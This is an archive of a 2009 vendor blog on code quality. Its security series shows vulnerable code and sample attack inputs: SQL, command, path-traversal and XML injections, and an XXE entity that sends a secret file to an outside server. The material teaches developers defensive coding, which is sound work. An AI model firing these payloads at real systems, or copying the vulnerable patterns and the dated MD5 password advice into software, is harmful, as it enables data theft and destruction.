Wednesday, November 25, 2009

Empirical overview of security vulnerabilities [3/4]

The third post of this series focused on security vulnerabilities addresses code injections issues.

Code injection

Code injection is probably one of the most known security vulnerabilities for developers, however our analyses show it remains a major cause of issues related to security.

Code injection aims to take control of a command or a query by using some parameter which is not simple raw data, but contains code which will be executed without any control. It is part of security holes which are easiest to implement, even for a non expert, and has implications which can be extremely serious, such as recovery or destruction of confidential data.

An example with a SQL query in C#:

  string query = "SELECT * FROM user "
    + "WHERE login='" + paramLogin 
    + "' AND password='" + paramPassword 
    + "'";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.ExecuteNonQuery();
  }

If the parameter paramPassword is a form field and the user enters 'OR 1=1, password condition will be simply ignored. And to destroy data, the user could try something like: '; DROP TABLE user; ...

In terms of code analysis, we consider 2 levels of severity according to the origin of parameters:

  • parameter comes from a method parameter or a class attribute. It is not possible to assert that there is a security issue, because the parameter may have been checked before. But there is still a risk, because the query may be dangerous when reused elsewhere.
    public User authenticate(string paramLogin, string paramPassword)
    {
      ...
      
      string query = "SELECT * FROM user "
        + "WHERE login='" + paramLogin 
        + "' AND password='" + paramPassword 
        + "'";
     
      using (SqlCommand cmd = new SqlCommand(query, someConnection))
      {
        cmd.ExecuteNonQuery();
      }
      
      ...
    }
    
  • parameter comes directly from a HTTP parameter (such as a form field). You are usually sure it is a real security hole:
    public User authenticate()
    {
      ...
      
      string query = "SELECT * FROM user "
        + "WHERE login='" + Request["login"]
        + "' AND password='" + Request["password"] 
        + "'";
     
      using (SqlCommand cmd = new SqlCommand(query, someConnection))
      {
        cmd.ExecuteNonQuery();
      }
      
      ...
    }
    

This flaw is mainly known for SQL queries, but we often forget that it can apply to other areas. Usually, recommendations for protecting against injection code are:

  • verify data entry (e.g. a login should not contain quotes)
  • systematically escape special characters such as quotes
  • or better, use parameterized queries which will take care for this escaping automatically

SQL Injections and derivatives

Examples of SQL injections presented above also apply to SQL alternative technologies:

  • HQL language for Java persistence framework Hibernate
  • JPQL language for Java persistence specification JPA
  • generic query language LINQ for C#
  • ...

Actually, injection is possible when query is built concatenating parameters directly. You can manually escape special characters such as quotes, but the best solution is generally to use parameterized queries, which are available in most technologies. In addition to escaping special characters, these queries format parameters according to their data type, and may sometimes improve performance by caching structures of queries before setting parameters.

public User authenticate()
{
  ...
  
  string query = "SELECT * FROM user "
    + "WHERE login=@login AND password=@password";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.Parameters.AddWithValue("@login", Request["login"]);
    cmd.Parameters.AddWithValue("@password", Request["password"]);

    cmd.ExecuteNonQuery();
  }
  
  ...
}

We also recommend the following two actions:

  • never show SQL errors directly to the user. Otherwise, the attacker could use them to find flaws inside queries
  • configure privileges of account used for database connection, in order to limit harmful actions, for example by prohibiting actions altering the database schema

Command Injection

Another area in which we detect some code injections opportunities: executions of command lines. Imagine a generic web service launching a tool through a command line and passing some parameter coming from the HTTP request:

  @Override
  protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException
  {
    String param = req.getParameter("param");
    Process process = Runtime.getRuntime().exec("c:\\someTool.bat " + param);
    ...
  }

By setting parameter with a value like 0 | del c:\\xxx, an attacker might cause some pretty damage on system! Although the Java API used here covers most cases trying to handle each term of the command as arguments of the first program, we see that it remains necessary to check the contents of the HTTP parameter.

Injection of a file path

Another type of injection easy to set up and rather dangerous: inject a file path when the parameter is used to retrieve a file. For example, in this JSP, we support a copyright notice from language defined in HTTP parameter:

<html>
  ...
  <jsp:include page="copyrights/<%= request.getParameter("lang") %>"/>
  ...
</html>

If the attacker changes its parameter lang for a value such as ../../../../etc/passwd, he simply retrieves the file from the HTTP response. To avoid this vulnerability, you have to use static includes (<%@include file="copyrights/fr"%>), lock access to external / confidential files, and, again, check parameters before you use them.

XPath Injection

XPath is a query language in the same vein as SQL but applicable to XML documents. Previous SQL query might be written in XPath with something like: //users/user[login/text()='...' and password/text()='...']. Problem is identical to SQL injection, but XPath implementations do not always offer any equivalent parameterized queries. Example with the standard Java API (> 5.0), which allow to handle this case properly:

public void authenticate(String login, String password) 
  throws ParserConfigurationException, XPathExpressionException, IOException, SAXException
{
  XPath xpath = XPathFactory.newInstance().newXPath();
  xpath.setXPathVariableResolver(new AuthResolver(login, password));
  XPathExpression query = xpath.compile("//users/user[login/text()=$login and password/text()=$password]/id/text()");
  Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder
      ().parse(new File("auth.xml"));
  
  String userId = query.evaluate(d);
  ...
}

private final static class AuthResolver implements XPathVariableResolver
{
  private final String login;
  private final String password;

  public AuthResolver(String login, String password)
  {
    this.login = login;
    this.password = password;
  }

  public Object resolveVariable(QName qName)
  {
    if ("login".equals(qName.getLocalPart()))
      return login;
    if ("password".equals(qName.getLocalPart()))
      return password;
    
    return null;
  }
}

XML Injections

XML is often used as interchange format in SOA. Imagine a banking service recording account transactions from orders formatted as follows:

<?xml version="1.0" encoding="UTF-8"?>
<order>
  <accountId>123</accountId>
  <amount>10000</amount>
  <type>debit</type>
</order>

Now, imagine that this order is generated from an input form in which the user enters an amount with value 0</amount><type>credit</type><amount>10000. XML order becomes:

<?xml version="1.0" encoding="UTF-8"?>
<order>
  <accountId>123</accountId>
  <amount>0</amount>
  <type>credit</type>
  <amount>10000</amount>
  <type>debit</type>
</order>

Depending on how this XML document is read, order could be recorded as a credit instead of debit: this will be the case when using DOM search limited to the first element found.

This type of injection is easily prevented by validating the XML document with a model (DTD or XSD Schema), in addition to common operations such as (data verification or escaping of special characters). This is the reason why we offer a rule requiring to validate an XML document before parsing.

XXE (Xml eXternal Entity) Injections

Another type of injection specific to XML (source: http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html), but based on the concept of external entities, which is a mechanism for static inclusion in XML:

<!DOCTYPE root [
<!ENTITY secreteKey SYSTEM "file:/somedir/secreteKey" >
] > 
<?xml version="1.0" encoding="UTF-8"?>
<root>
  <node>&secreteKey;</node>
</root>

When the file is interpreted by an XML parser, the text node node is dynamically replaced with the contents of the file declared by the external entity.

If this file comes from another system, it offers the possibility to access unprotected data. To view these data, either ill-intentioned system is able to parse XML file (e.g. an RSS feed sent to a aggregation server), either it could even retrieve data automatically via a second external entity pointing to a server which it can access:

<!DOCTYPE root [
<!ENTITY secreteKey SYSTEM "file:/somedir/secreteKey" >
<!ENTITY sendSecreteKey SYSTEM "http:// someserver.com/?&secreteKey;" >
] > 
<?xml version="1.0" encoding="UTF-8"?>
<root>
  <node>&sendSecreteKey;</node>
</root>

The solution is simply to not accept external entities in files coming from third parties, and of course, to protect your file system ...

Conclusion

All types of injections are not listed here, but if there was only one thing to remember, this would be : systematically validate received data before using them!

To be continued... Next post will conclude this series with a medley of other vulnerability issues regularly seen on Cockpit, and which are sometimes surprising.

Wednesday, November 18, 2009

Empirical overview of security vulnerabilities [2/4]

The second post of this series focused on security vulnerabilities addresses two distinct issues: concurrent access and object encapsulation.

Concurrent access

This is one of the most difficult areas to master in development. At the design stage, many of us having only one brain, or at the test stage, because simulating concurrent operations is often tricky to set up and even more to reproduce. Concurrent access have impact on several quality dimensions: reliability, performance, maintainability, but also security. Here are some examples.

Sharing of attributes

One of the recurring problems in Java or C# development is the thread-safe notion: is the objet usable simultaneously by several threads or not ? This information should be available in the API documentation. Misuse can lead to unpredictable results. Through Cockpit, we no longer count unsynchronized uses of formatting classes in Java from java.text package, such as java.text.SimpleDateFormat. Because few Java developers know that without synchronizing calls to these classes, they will sometimes get very strange results...

Another example with a direct impact on security is related to the use of some web frameworks. In order to improve performances, many of them use instance pools for providing components handling HTTP requests. For example in Java: Struts (V1), Spring MVC or even servlets. Same problem with C# frameworks such as ASP.NET MVC.

The problem is that this pool mechanism is not always well exposed in the documentation, and the consequences may not be understood by developers. Worst case may lead to mix information from different users.

An example with a servlet (basic Java component handling a HTTP request):

public class SomeServlet extends HttpServlet
{
  private Account account;

  @Override
  protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException
  {
    account = retrieveAccount(req);
    doSomething();
  }

  protected void doSomething()
  {
    String name = account.getName();
    ...
  }
}  

This code stores information read from the HTTP request into an attribute of the servlet. Then it performs some operations through another method, operation which use the same attribute. The problem is that if a second request comes before the doSomething()method is called, the attribute will be replaced with information related to the second query. Because a servlet is provided by default through a single shared instance.

I remember having worked on a project for a worldwide known client where users complained sometimes about losing their context and viewing information related to other users. This was exactly this servlet attribute issue! Consequences were limited here because it was an intranet with information which were not confidential, but you can easily imagine the situation in critical environments such as bank applications.

So check your API documentation and track down attributes in components which are not thread-safe. In web applications, data must be stored in the context of the request, session or application.

Singletons

Although the use of singletons is being discarded in favour of dependency injection, it remains a common pattern considered as trivial to write. Yet our results show that more than one project on two contains singletons poorly written.

An example in C#, here the singleton is created at the first call (lazy instantiation):

public sealed class BalanceHistory
{
  private static BalanceHistory INSTANCE;

  private BalanceHistory() { }

  public static BalanceHistory Instance
  {
    get
    {
      if (INSTANCE == null)
      {
        INSTANCE = new BalanceHistory();
      }
      
      return INSTANCE;
    }
  }
}     

If the getter getInstance() is called two times simultaneously, the singleton may be recreated twice: if both tests find the singleton as null, they will both create a new instance, and callers will work on distinct singletons (and the singleton created first will be lost)...

There are several ways to solve this problem:

  • create the instance at declaration: private static BalanceHistory INSTANCE = new BalanceHistory();. This is usually the best solution, this instantiation will be really effective when class will be loaded, so in the case of a singleton, at the first call of getInstance()!
  • synchronize the creation of the instance: in C# through [MethodImplAttribute (MethodImplOptions.Synchronized)], or via some lock on a dedicated lock object
  • use a pattern based on inner classes, cf. Initialization on demand holder idiom pattern
  • use Double-checked locking pattern, even if it causes usually more problems than it solves (we considered this pattern as forbidden in the Cockpit)

Object Encapsulation

Protecting access to data is one of the basic principle of Object-Oriented Programming (OOP), but it does not mean that this kind of problems are solved by OOP.

Data accessibility

OOP allows to protect data by using keywords defining their visibility from the rest of the application, according to the location of classes: private, protected, public, internal (C#), extern (C#), ... Other keywords allow to prevent overloading a class or method: final (Java) or sealed (C#). This configuration of accessibility is not trivial. It requires to find the right balance between security and scalability, while keeping simple code.

Regarding the visibility of class attributes, the developer must add accessors to give them more visibility, keeping some way to check or modify data. Since this work is not very rewarding, that the code is burdened by methods (and properties in C#) which do nothing but set or return attributes, and that developers are lazy by nature, these attributes are sometimes defined as non-private.

And regarding overloading of classes or methods, most of developers do not take care of finalizing/sealing their code, without considering the risks.

These risks may be classified into two types:

  • some ill-intentioned uses from third-party code. This objection is often theoretical, because class loaders do not easily allow such exploitation. However, some designs based on plugins or dependency injection makes these vulnerabilities easier to exploit
  • implementations originally well-intentioned may introduce flaws by overloading critical functions which should be protected, for example a method retrieving user rights.

Developers must therefore always take care of visibility about data or critical processings.

Exposure of mutable data

Another area difficult to manage in OOP and which has a direct impact on security is the exposure of mutable attributes. A mutable object is an object whose state can be changed after initialization, e.g. an array or a StringBuilder but also most of the POJO / POCO created in an application.

The problem is that a getter on a mutable attribute does not only give some simple access permission, it allows the caller to change the state of this attribute. A list of user rights could therefore be easily changed:

public class User
{
  private Set<UserRole> roles = new HashSet<UserRole>();

  ...
  
  public Set<UserRole> getRoles()
  {
    return roles;
  }
}

public class MaliciousCode
{
  public void someMethod()
  {
    User user = userRegistry.findUser("myUserId");
    user.getRoles().add(UserRole.Admin);
  }
}

To guard against such problems, several defensive options are available:

  • return a copy of the attribute:
    public class User
    {
      public Set<UserRole> getRoles()
      {
        return new HashSet<UserRole>(roles);
      }
    }
    

    In some cases, the copy must be deeply cloned, e.g. if the attribute is a list of mutable objects, each mutable object of the cloned list must also be cloned. The problem is that the callers will not have the original instance: if attribute is updated somewhere, cloned instances will no be synchronised.

  • return a proxy wrapping mutable object and blocking update methods. For example:
    public class User
    {
      public Set<UserRole> getRoles()
      {
        return new HashSet<UserRole>(roles)
        {
          @Override
          public boolean add(UserRole o)
          {
            throw new UnsupportedOperationException();
          }
    
          @Override
          public boolean remove(Object o)
          {
            throw new UnsupportedOperationException();
          }
          
          ...
        };
      }
    }
    

    All update methods must be overridden. Compared to the previous option, avantage is that you can finely control access to each method, and most important, you keep original instance through proxy encapsulation

    Java also provides an API to lock easily collections in read-only using this mechanism, thanks to the class java.util.Collections. Just write for example:

    public class User
    {
      public Set<UserRole> getRoles()
      {
        return Collections.unmodifiableSet(roles);
      }
    }
    

Whatever the cases, these mechanisms must be reserved for specific cases where exposed data are critical, in order to avoid reduction of performance because of unnecessary instantiations.

To be continued... In the next post, we will discuss issues related to code injection.

Tuesday, November 10, 2009

Empirical overview of security vulnerabilities [1/4]

The objective of this four-part article is to provide an overview of security issues identified through the Cockpit. Unlike other surveys which are based on theoretical approaches more or less exhaustive, approach is here empirical: problems mentioned are those we detect through our automated analyses on our customer projects (static analysis on Java or C# code). These problems are those that seem most interesting to inject as a new booster shot for developers who would still not be sensitive to this security dimension.

Preamble

Results are not reassuring, many security rules, even basic, are often ignored in development. Even less reassuring when you know that these applications are sometimes part of the critical sectors: banking, insurance, health ... This may be probably explained by several factors:

  • developers show often motivations related to innovation, technical challenges, addition of new features, whereas security prefers paranoid-like behavior, requires mature technologies / architectures, and becomes fragile as soon as you introduce new elements
  • an obvious lack of training. We all presume that security is a prerequisite known by all developers, but only few training schools or companies really educate (future) developers about security concerns
  • security-oriented tests are rarely performed during acceptance phases, which are often limited to check functional and architectural behaviors. And when black box tests are implemented (e.g. with software testing exploration using HTTP access), they do not detect all issues detected by white box tests. And they sometimes arrive too late to allow a fixing campaign on code.

Any quality problem inside code is a potential security issue!

We present here various security issues poorly addressed in developments, but everyone must also understand the following assertion: any quality problem inside code is a potential security issue. Some basic detections such as self-assignments ( someVar = someVar; ), inverted conditions ( if (someValue.someMethod () & & (someValue! = null)) ), infinite recursive calls, creation of unnecessary instances inside iterations, lack of verification of method result, etc.. are likely to create security issues:

  • unexpected behavior (validation of erroneous form data, wrong permissions added to users, confidential data displayed, ...)
  • application crash (lack of memory, execution stack full, ...)

This article describes some quality rules having a direct impact on security. We start first part with the use of encryption algorithms.

Encryption algorithms

The choice of an encryption algorithm is crucial. Firstly because it is often difficult to change algorithm once it has been used in the application (for example, if you used to save your passwords with a MD5 checksum and want to move to SHA, you will not be able to check existing passwords as they will no longer be comparable).

And on the other hand because it is obviously necessary to select a robust algorithm. To avoid implementing some custom algorithms with suspicious reliability, projects often resort to standard algorithms whose specifications are public: MD5, AES, RSA, ... But two problems arise:

  • these algorithms have not an endless lifetime! The evolution of computing power and the constant search for security holes make obsolete some algorithms yesterday considered as unbreakable. Developers must keep informed of the news. However broken algorithms such as DES (symmetric algorithm) or MD5 (fingerprint algorithm) are still numerous in code. Even if they are not always dangerous in the short-term (like MD5), you have to anticipate they could persist for several years in the project.
  • these algorithms must be configured: key size, passwords, salt, padding, ... Again, some knowledge is needed to use these algorithms in a secure way. For example, storing passwords with a fingerprint algorithm (MD5, SHA ...) without using salt to prevent from Rainbow-table attacks is a nonsense.

Recommendations :

  • Use algorithms up to date. For example: SHA for fingerprints, AES for symmetric encryption or RSA for asymmetric encryption.
  • Use keys with sufficient sizes. For example 128 for AES or 2048 for RSA. See Wikipedia: Key size.
  • Take care of configuring the algorithms properly:
    • systematically add salt inside fingerprints for confidential data (obviously not for identification data such as file checksums). For example: md5("a fixed and original value" + somePassword)
    • use padding options, and good ones. For example, the OAEP padding with RSA (Java: Cipher.getInstance( "RSA/ECB/OAEPPADDING), C#: RSA.Encrypt(dataToEncrypt, true))
  • Hide passwords and salts. Except when they may be requested interactively when starting application, they must necessarily be stored somewhere, so use the least accessible way: drowning in code (code obfuscation, dynamic generation, dispersal, .. .), encryption in external files (which requires then to store other passwords ...), ....

To be continued... In the next part, we will discuss issues related to concurrency and object encapsulation.

Thursday, July 9, 2009

Innovation Prize2009 from European Security and Information System Congress

 Prix de l'Innovation

A new award in our trophy room: The 2009 Innovation Price from the European Security and Information System Congress !

This price is important due to its notoriety and to the jury's composition, composed by the security managers of several top firms (SNCF, BNP Paribas, SFR, etc...). It particularly delighted us by highlighting the Security dimension of our platform:

  • Firstly, it acknowledges our SaaS model as being innovative and perfectly adapted to the security needs of our customers. We worked very hard to guarantee the confidentiality of the code analyzed on our servers and our customers’ assessments have always been excellent. This price gives an additional answer :-)
  • Secondly, it confirms our vision that security must be taken into account right at the beginning of the software development by continuously checking the source code to avoid bad practices that create vulnerabilities and to increase the security knowledge of the software development teams.

The European Security and Information System Congress takes place in Monaco, from October 7th 2009 to October 10th 2009. We have a dedicated booth and we will be glad to present our solution.

Link to the Assises website

Link to the Kalistick website

Thursday, July 2, 2009

Statistical analysis of code to improve its performance

We recently published a Société Générale testimonial that explained that the company had successfully reduced some of its processing time from 20 minutes to 20 seconds by using our Quality Cockpit on one of its projects.

Too much to be credible? Let's see how a statistical analysis of code helps to detect performance problems earlier, regardless of whether they are associated to the CPU or RAM.

One Example

Here is the first example. It happens often, and it is very easy to follow:

User findUser(UserManager userManager, String id)
{
...
if (userManager.retrieveUser(id) != null)
{
 User user = userManager.retrieveUser(id);
 ...
}
...
}

This is a typical example of the DRY antipattern, whereby processing is repeated twice in the code. The developer might have thought that it would be too much to automatically declare the user variable before the if statement, or he simply did an inappropriate copy/paste. Perhaps he thought that the call to the retrieveUser method would have a negligible load on the system. However, this code presents several problems:

  • The developer might consult the code for the retrieveUser method at an instant T, but he does not know what will happen to this method after implementation. For example, this implementation might use a high-performing memory cache at first and then change to a database lookup. Unnecessary calls that went unnoticed before may eventually impact performance.
  • Following the same principle, we cannot control where our procedure will be called. If the findUser method is inefficient, it is not necessarily serious if it is called only once, such as when the user logs in. If the method comes to be called regularly, such as with each webpage that opens on a very active site, then its performance becomes critical.

This problem is common in object-oriented programming, the encapsulation principle. We can't focus on how a service is implemented, only on its contract (ex: a method's signature). This is especially true with the dependency injection mechanism (IOC).

This is one of the most common pitfalls in performance problems. A real problem might be hidden in less visible code for a while before becoming truly critical. That is why it is important to correct these problems as early as possible.

Some Recurring Causes

In performance-related anomalies affecting our platform, we can identify some categories of recurring problems:

Poorly managed concurrent access

Without even addressing the problem of deadlocks, we regularly find unnecessary synchronizations. For example, instead of synchronizing on a field, the whole method is synchronized, which can slow down processing. This is also why we suggest having a rule to prohibit synchronizations at the method level so as to encourage developers to target and control their synchronizations better.

Similarly, thread-safe classes are sometimes used when their non-synchronized version should be used, which consumes less resources (ex: in Java, java.util.ArrayList for a java.util.Vector).

Poor memory management

Just because a language has a garbage collector to automatically clean objects in memory, that doesn't mean that we don't need to pay attention to memory management.

First of all, there are often direct calls to the garbage collector. This practice is not recommended because it can skew its internal algorithms and thereby reduce performance for the next cleanings.

However, resources need to be freed up. This includes removing references to objects that are no longer being used and, for C#, managing Disposable better, such as by releasing the Disposable attributes in the finalizer or declaring classes with native attributes to be Disposable.

We also find bad practices related to unnecessary instantiations:

  • Declaration of non-static loggers. Generally, a logger object is associated with a class, and there is no need to create a specific instance for each of the class's objects. The logger should be declared as static.
  • Instantiations of objects that use only static methods
  • Redundant instantiations in loops
  • ...

Unnecessary code

A simple way to improve performance is to track down unnecessary code:

  • Redundant casting
    if (o is User)
    handleUser(o as User);
    
    Since the C# is operator is already casting implicitly.
  • Instantiated, but unused variables (dead code)
  • Writing to logs without checking the trace level
    User findUser(UserManager userManager, String id)
    {
    User user = ...
    
    List projects = projectManager.findProjects(user);
    LOGGER.debug("User found: " + user + ",available projects:" + projects);
    
    return user;
    }
    
    Here, a project list is returned only to be displayed in a debug log. This operation should only run if the application is in debug mode, so the applicable code should be surrounded by if (LOGGER.isDebug()))
  • Unnecessary tests
    if (true)
    {
    ...
    }
    

Insufficient knowledge of the language

Some performance problems are quite simply due to a lack of knowledge of the language and basic classes. Here are a few examples:

  • In C#: if (someString == ""). The test for an empty character string should be done with System.String.IsNullOrEmpty(System.String), which generates lighter IL code.
  • In C#: public static readonly Int32 someConstant=128. A constant should be declared with the keyword const: public const Int32 someConstant=128. The generated IL code will then use the constant value and will therefore perform better.
  • In Java: String s = new String("kalistick"). This automatically instantiates a new object, even though the JVM uses a character string cache because of String s = "kalistick".
  • In Java: Integer i = new Integer(args[0]). Same thing. Since Java 5, the JVM uses a cache of numeric values. This cache is invoked by writing Integer i = Integer.valueOf(args[0]).
  • In Java: String s = "value = " + args[0]. A classic error that often comes from profiling. Character strings should always be concatenated using the StringBuffer or StringBuilder class (unless the concatenated terms are constants, in which case the compiler will optimize the concatenation).

How to prevent performance problems

Now that we've discussed some easily identifiable problems, the question is how to avoid them as early as possible. The first answer is to use trained and experienced developers! Every developer has the right to youthful indiscretions, but one would hope that they would only commit them once. :-) Training is key in our approach. The developer can find errors, document them in the best practices, and avoid reproducing them the same errors in the future.

The second solution is to use a specialized tool to analyze performance: a profiling tool. Such tools are designed to trace the execution of an application in order to provide a detailed view of its performance, whether in real time or afterwards, including CPU usage, memory used, threads, garbage collector activity, etc. A drill-down mechanism is generally recommended for targeting the faulty code. Learning how to use them may not always be simple, but the challenge is in running the application with test scenarios that are exhaustive enough to cover all of the code to be tested.

References: JProfiler (Java), YourKit (Java and C#), and dotTrace (C#). Java has its own version 6 of an integrated profiling tool: VisualVM.

Conclusion

Statistical analysis is less productive and exact than a profiling session because it doesn't know the context of execution, but it can be used to quickly and easily identify obvious defects, particularly upstream of the problems. And this is a key point to our approach: The earlier you correct problems, the less expensive it will be!

Tuesday, May 19, 2009

Simplify your code

By examining the results of analyses on our customers' projects on our Cockpit SaaS platform, it is clear that a "Quick Win" strategy is often used for corrections. The team prioritizes glaring bugs (like floating point comparisons and synchronization problems) that are quick to correct (dead code, redundant casting, missing documentation headers, etc.).

Among the anomalies that remain week after week, we generally find overly complex methods. This type of problem is often considered to be complicated and risky to resolve for a rather hypothetical benefit. By checking their dashboards on the Cockpit, development teams are aware of the problem and therefore improve new development projects, but pre-existing methods are rarely corrected. Let's consider the return on investment for this type of correction: the cost may be small, risks are controlled, and the benefits may be high.

Complex?

By complex, we are referring to a method that is rather long or complicated in its algorithms. Theoretically, complexity is reflected in a high number of instructions (typically > 100, which equates to about 200-250 lines) or significant cyclomatic complexity (typically > 20). Based on our statistics, we find that about 4% of methods are highly complex methods in the projects we analyze for the first time, but this low percentage often represents 10% to 20% of the application's total code (depending on the project type and language)! Here is a typical example of how methods are distributed according to their cyclomatic complexity in a Java project:

Chart of methods by complexity

Another dimension that can add to the complexity of methods is the number of distinct dependencies on external types/classes (the efferent coupling concept). One method using many types in its processing is generally more difficult to understand and test. We will soon offer a new quality rule that includes this dimension in the Cockpit rules repository (this rule is currently being configured to set the different thresholds).

Why simplify these methods

There are true challenges associated with simplifying a complex method. The objective is not just to come below the theoretical thresholds set by some quality manager or tool.

  • Maintenance: This is the most obvious reason. By definition, a complex method is difficult to understand and update.
  • Testability: A complex method generally cannot be properly unit tested. A unit test should check one process... a unit. Testing a method that combines several processes is like tasting several wines mixed in a single glass; it is difficult to draw reliable conclusions. This touches upon responsibility, which is particularly important in object-oriented development.
  • Reusability: It is more difficult to reuse a method that strings together different processes with varying specificity than to reuse unitary methods. Here again, this is a matter of responsibility.
  • Extensibility: With inheritance, it is preferable to overload unitary methods rather than to redefine a complex method altogether, avoiding having to copy code.
  • Automatic documentation: Modern languages generally have standard documentation in the header comments for methods, and these comments can be used to automatically generate technical documentation. Breaking apart a method lets you transform informal internal comments into standard documentation, creating added value. In addition, the simple fact of naming the new unitary methods helps to automatically document the code.

Are there risks in simplifying a method?

Common sense suggests that changing a complex method leads to a regression risk. This is both because the process is difficult to understand and because it affects so many areas in regression.

In many cases, however, using the right tools can help to reduce risk or even remove it entirely. This is the principle of refactoring. The program's structure is modified without impacting its behavior.

How do you simplify a complex method?

There are two possible ways: manual refactoring and automatic refactoring.

Manual refactoring

Let's consider the following method:

  public void addToProject(String input) throws InputException
{
 // Apply regexp to input string
 Matcher matcher = PATTERN.matcher(input);
 if (!matcher.matches())
   throw new InputException("Input does not match:" + input);

 // Retrieve user
 String idUser = matcher.group(1);
 User user = userService.findUser(idUser);
 if (user == null)
   throw new InputException("No user for ID:" + idUser);
 if (!user.isActive())
   return;
 String password = matcher.group(2);
 if (user.getPassword().equals(password))
   throw new InputException("Invalid password for user:" + idUser);

 // Retrieve project
 String idProject = matcher.group(3);
 Project project = projectService.findProject(idProject);
 if (project == null)
   throw new InputException("No project for ID:" + idProject);
 if (project.hasUser(user))
   return;

 // Add user to project
 project.addUser(user);
 projectService.saveProject(project);
}

The purpose of this method is to add a user to a project after first checking the supplied information, and the parameters are encoded in a string. Four successive processes can easily be identified in this method: unencoding the input string, identifying the user, identifying the project, and associating the user to the project. Altogether, it might not seem complex, but imagine having to manage even more parameters or input controls.

A good response would be to simplify this method by separating the user and project lookups into two distinct methods. This type of refactoring is generally referred to in the IDE as Extract/Introduce method. But in this case, there are two recurring problems for this type of refactoring:

  1. There are multiple output points defined with different types: Boolean, objects User or Project, or void.
  2. Multiple variables are updated in the externalized processes.

The problem is that a Java or C# method can only return one type. The second problem can sometimes be resolved by passing variables in as parameters, but this only works if the variables can truly be passed by reference, which is not possible with scalar types or strings, for example.

At least two solutions can resolve this gracefully. Both require introducing an object that encapsulates the different variables that might be updated. These are based on known refactoring, as popularized by Martin Fowler.

Introduce Parameter Object + Extract Method

This solution involves regrouping the variables used for input and output into a new object and then passing the object from method to method. The new object generally contains only attributes. In C#, this is typically implemented with a private class, and in Java, a private static class is used (preferably with comments ;-) ):

  private final static class InputContext
{
 private Matcher matcher;
 private User user;
 private Project project;

 private InputContext(Matcher matcher)
 {
   this.matcher = matcher;
 }

 public Matcher getMatcher()
 {
   return matcher;
 }

 public void setMatcher(Matcher matcher)
 {
   this.matcher = matcher;
 }

 public User getUser()
 {
   return user;
 }

 public void setUser(User user)
 {
   this.user = user;
 }

 public Project getProject()
 {
   return project;
 }

 public void setProject(Project project)
 {
   this.project = project;
 }
}

Traditional refactoring, Extract Method, can also be used as normal:

  public void addToProject(String input) throws InputException
{
 // Apply regexp to input string
 Matcher matcher = PATTERN.matcher(input);
 if (!matcher.matches())
   throw new InputException("Input does not match:" + input);

 InputContext inputContext = new InputContext(matcher);

 // Fill context with user & project
 if (!retrieveUser(inputContext))
   return;
 if (!retrieveProject(inputContext))
   return;

 // Add user to project
 Project project = inputContext.getProject();
 project.addUser(inputContext.getUser());
 projectService.saveProject(project);
}

protected boolean retrieveUser(InputContext inputContext) throws InputException
{
 String idUser = inputContext.getMatcher().group(1);
 User user = userService.findUser(idUser);
 if (user == null)
   throw new InputException("No user for ID:" + idUser);
 if (!user.isActive())
   return false;
 String password = inputContext.getMatcher().group(2);
 if (user.getPassword().equals(password))
   throw new InputException("Invalid password for user:" + idUser);

 inputContext.setUser(user);

 return true;
}

protected boolean retrieveProject(InputContext inputContext) throws InputException
{
 String idProject = inputContext.getMatcher().group(3);
 Project project = projectService.findProject(idProject);
 if (project == null)
   throw new InputException("No project for ID:" + idProject);
 if (project.hasUser(inputContext.getUser()))
   return false;

 inputContext.setProject(project );

 return true;
}

In addition to simplifying maintenance, we see that externalized processing can be easily overloaded by inheritance.

Replace Method with Method Object

This refactoring builds upon the concept of encapsulation by introducing externalized methods into the new object's class. The object paradigm calls for data and associated processing to be grouped into coherent, autonomous entities. Both solutions are relevant. You can decide whether you prefer to separate or group together data and processing. The same choice can be found in the debate over Active Record versus DAO.

Automatic refactoring

There are obviously regression risks involved with manual refactoring. Fortunately, IDEs are quite advanced in this area. Traditional refactoring, such as renaming, moving, and introducing variables, has existed for a long time. More recently, more advanced refactoring has become available. IntellijIDEA offers Replace Method with Method Object refactoring (under the name Extract Method Object).

Simply select the block of instructions to externalize to do an Extract Method. If IntellijIDEA detects that this refactoring is not possible, it prompts for Replace Method with Method Object refactoring:

'Extract Method' function with IntellijIDEA

This refactoring can be configured via the GUI:

'Extract Method Object' function with IntellijIDEA

IntellijIDEA is currently the only IDE to support this type of refactoring. The others only have Extract Method (Eclipse or Netbeans for Java, Visual Studio ReSharper or Refactor! Pro plugins for C#).

The advantages of automatic refactoring are obviously its speed and the lack of regression-related risk (thus the importance of choosing the right development tools for optimizing productivity). Here, the developer's only job is to identify blocks of instructions to externalize and then naming them. We can then review the most complex methods in a project and simplify them one by one (if possible, documenting them and associating unit tests to them).

Conclusion

As always, it is best to avoid upstream problems, especially when it comes to having to make corrections. Developers should be careful to write only unitary methods. Knowing how to split up a method comes with experience, and extracting methods then becomes natural. But don't overlook the increased productivity that is available with modern IDEs, particularly in their refactoring functions.

Monday, March 23, 2009

What is quality software?

What is quality software? The answer will largely depend on the role of the person you ask. A user will focus on their needs, while someone in charge of maintenance will prefer code that is reliable, readable, and understandable. Some will be happy with a quantitative definition (ex. the number of bugs per 1000 instructions), while others prefer a more qualitative definition (how well it satisfies user needs, the successfulness of the product, etc.).

For more than 30 years, countless researchers have worked to find models that effectively and objectively quantify software quality.

Several models have been noteworthy, including the following:

The McCall Model (1977): McCall's "Quality Triangle" is one of the first published models for quality. Three high-level "perspectives" group together eleven factors of quality that can be measured based on a set of properties. One of the criticisms against this model is the subjectivity of some properties.

The Boehm Model (1978): Boehm and his team were inspired by the McCall model (a three-level hierarchical model), and they expanded the list of measurable quality factors.

http://en.wikipedia.org/wiki/Barry_Boehm http://sunset.usc.edu/Research_Group/barry.html

ISO 9126 (1991): The International Organization for Standardization's ISO 9126 was inspired by these models to define a standard quality model and establish recommendations for measuring its characteristics.

http://en.wikipedia.org/wiki/ISO_9126

However, despite the degree of theoretical maturity, it was difficult to put these models into practice. Software providers are fully aware of the impact of implementing code quality control on the reliability and maintainability of software. However, code quality remains an untapped source of improvements, as opposed to process quality or project management (CMMI, ISO certifications).

A study (2) conducted on nearly 200 software providers highlighted the reasons that discouraged them from establishing development quality procedures. The main reasons mentioned are:

  • Setup and monitoring time
  • The initial cost
